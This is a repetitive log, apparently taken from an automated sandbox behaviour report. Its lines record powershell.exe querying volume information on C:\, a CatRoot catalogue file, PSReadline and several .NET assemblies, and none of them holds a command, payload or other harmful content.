Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
